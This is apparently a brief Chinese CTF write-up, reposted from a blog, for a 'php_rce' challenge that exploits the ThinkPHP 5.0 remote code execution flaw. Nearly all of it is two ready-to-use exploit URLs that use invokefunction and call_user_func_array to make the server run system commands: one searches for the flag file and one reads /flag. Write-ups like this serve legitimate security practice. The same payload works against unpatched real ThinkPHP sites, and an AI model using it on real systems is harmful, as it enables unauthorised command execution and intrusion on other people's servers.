ThinkPHP 5.0 版本存在getshell漏洞 php_rce

查找flag:http://111.198.29.45:45747/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20%22flag%22

payload:http://111.198.29.45:45747/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag 得到flag

参考自:https://blog.csdn.net/weixin_45425482/article/details/103709085

学习用途

猜你喜欢

转载自www.cnblogs.com/clqnotes/p/12237295.html